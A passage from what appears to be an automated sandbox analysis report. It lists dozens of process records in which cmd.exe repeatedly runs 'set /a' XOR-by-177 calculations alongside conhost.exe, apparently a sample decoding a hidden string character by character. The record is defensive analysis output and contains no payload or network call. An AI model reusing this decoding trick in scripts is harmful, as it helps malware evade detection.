                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:17
                                                                                                                                                                                  Start time:10:51:33
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:875'008 bytes
                                                                                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:18
                                                                                                                                                                                  Start time:10:51:33
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:cmd.exe /c set /a "139^177"
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:19
                                                                                                                                                                                  Start time:10:51:33
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:875'008 bytes
                                                                                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:20
                                                                                                                                                                                  Start time:10:51:33
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:cmd.exe /c set /a "139^177"
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:21
                                                                                                                                                                                  Start time:10:51:33
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:875'008 bytes
                                                                                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:22
                                                                                                                                                                                  Start time:10:51:33
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:cmd.exe /c set /a "242^177"
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:23
                                                                                                                                                                                  Start time:10:51:33
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:875'008 bytes
                                                                                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:24
                                                                                                                                                                                  Start time:10:51:33
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:cmd.exe /c set /a "195^177"
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:25
                                                                                                                                                                                  Start time:10:51:33
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:875'008 bytes
                                                                                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:26
                                                                                                                                                                                  Start time:10:51:33
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:cmd.exe /c set /a "212^177"
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:27
                                                                                                                                                                                  Start time:10:51:33
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:875'008 bytes
                                                                                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:28
                                                                                                                                                                                  Start time:10:51:34
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:cmd.exe /c set /a "208^177"
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:29
                                                                                                                                                                                  Start time:10:51:34
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:875'008 bytes
                                                                                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:30
                                                                                                                                                                                  Start time:10:51:34
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:cmd.exe /c set /a "197^177"
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:31
                                                                                                                                                                                  Start time:10:51:34
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:875'008 bytes
                                                                                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:32
                                                                                                                                                                                  Start time:10:51:34
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:cmd.exe /c set /a "212^177"
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:33
                                                                                                                                                                                  Start time:10:51:34
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:875'008 bytes
                                                                                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:34
                                                                                                                                                                                  Start time:10:51:34
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:cmd.exe /c set /a "247^177"
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:35
                                                                                                                                                                                  Start time:10:51:34
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:875'008 bytes
                                                                                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:36
                                                                                                                                                                                  Start time:10:51:34
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:cmd.exe /c set /a "216^177"
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:37
                                                                                                                                                                                  Start time:10:51:34
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:875'008 bytes
                                                                                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:38
                                                                                                                                                                                  Start time:10:51:34
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:cmd.exe /c set /a "221^177"
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:39
                                                                                                                                                                                  Start time:10:51:34
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:875'008 bytes
                                                                                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:40
                                                                                                                                                                                  Start time:10:51:34
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:cmd.exe /c set /a "212^177"
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:41
                                                                                                                                                                                  Start time:10:51:34
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:875'008 bytes
                                                                                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:42
                                                                                                                                                                                  Start time:10:51:34
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:cmd.exe /c set /a "240^177"
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:43
                                                                                                                                                                                  Start time:10:51:34
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:875'008 bytes
                                                                                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:44
                                                                                                                                                                                  Start time:10:51:34
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:cmd.exe /c set /a "153^177"
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:45
                                                                                                                                                                                  Start time:10:51:34
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:875'008 bytes
                                                                                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:46
                                                                                                                                                                                  Start time:10:51:35
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:cmd.exe /c set /a "220^177"
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:47
                                                                                                                                                                                  Start time:10:51:35
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:875'008 bytes
                                                                                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:48
                                                                                                                                                                                  Start time:10:51:35
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:cmd.exe /c set /a "145^177"
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:49
                                                                                                                                                                                  Start time:10:51:35
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:875'008 bytes
                                                                                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:50
                                                                                                                                                                                  Start time:10:51:35
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:cmd.exe /c set /a "195^177"
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:51
                                                                                                                                                                                  Start time:10:51:35
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:875'008 bytes
                                                                                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:52
                                                                                                                                                                                  Start time:10:51:35
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:cmd.exe /c set /a "133^177"
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:53
                                                                                                                                                                                  Start time:10:51:35
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:875'008 bytes
                                                                                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:54
                                                                                                                                                                                  Start time:10:51:35
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:cmd.exe /c set /a "145^177"
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:55
                                                                                                                                                                                  Start time:10:51:35
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:875'008 bytes
                                                                                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:56
                                                                                                                                                                                  Start time:10:51:35
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:cmd.exe /c set /a "157^177"
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:57
                                                                                                                                                                                  Start time:10:51:35
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:875'008 bytes
                                                                                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:58
                                                                                                                                                                                  Start time:10:51:35
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:cmd.exe /c set /a "145^177"
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:59
